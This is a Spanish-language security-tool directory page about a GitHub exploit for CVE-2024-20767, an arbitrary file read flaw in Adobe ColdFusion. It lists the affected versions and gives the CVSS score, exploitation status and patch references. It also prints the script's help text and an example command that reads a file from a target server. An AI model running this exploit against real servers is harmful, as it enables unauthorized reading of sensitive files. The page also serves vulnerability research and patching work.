Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2024-20767 — Exploit para CVE-2024-20767 - Adobe ColdFusion | Kitploit
Herramientas/GitHubGitHub/yoryio/cve-2024-20767
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebRecopilación de InformaciónPruebas de Penetración
GitHubyoryio/cve-2024-20767

CVE-2024-20767

Exploit para CVE-2024-20767 - Adobe ColdFusion

Ver Repositorio
349hace 1 añoRevisado por Kitploit

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2024-20767

CVE-2024-20767 - Lectura arbitraria del sistema de archivos mediante una vulnerabilidad de control de acceso inadecuado en Adobe ColdFusion

  • Consulte la publicación del blog de ma4ter para obtener más información: Adobe ColdFusion任意文件读取漏洞CVE-2024-20767分析

adobecoldfusionlogo

Productos y versiones afectados:

Descargar herramienta
ProductoVersiones afectadas
ColdFusion 2023Actualización 6 y versiones anteriores
ColdFusion 2021Actualización 12 y versiones anteriores
  • CVSS: 8.2
  • Explotado activamente: SÍ
  • Parche: SÍ
  • Mitigación: NO

Laboratorio

Puede implementar un servidor ColdFusion con una prueba gratuita de Adobe:

  • Descargar ColdFusion

Ayuda

root@kitploit:~
usage: CVE-2024-20767.py [-h] -t TARGET [-p PORT] -c COMMAND

options:
  -h, --help            show this help message and exit
  -t TARGET, --target TARGET
                        Target Adobe ColdFusion Server URL
  -p PORT, --port PORT  Target Adobe ColdFusion Server Port, by default we use the 8500 Port
  -c COMMAND, --command COMMAND
                        Path to read file

Ejemplo:

root@kitploit:~
python CVE-2024-20767.py -t http://192.168.124.203 -p 8500 -c Windows/ServerStandardEval.xml

Referencias

  • Adobe ColdFusion任意文件读取漏洞CVE-2024-20767分析
  • CVE-2024-20767: Vulnerabilidad crítica de Adobe ColdFusion expone archivos sensibles, PoC publicado
  • Actualizaciones de seguridad disponibles para Adobe ColdFusion | APSB24-14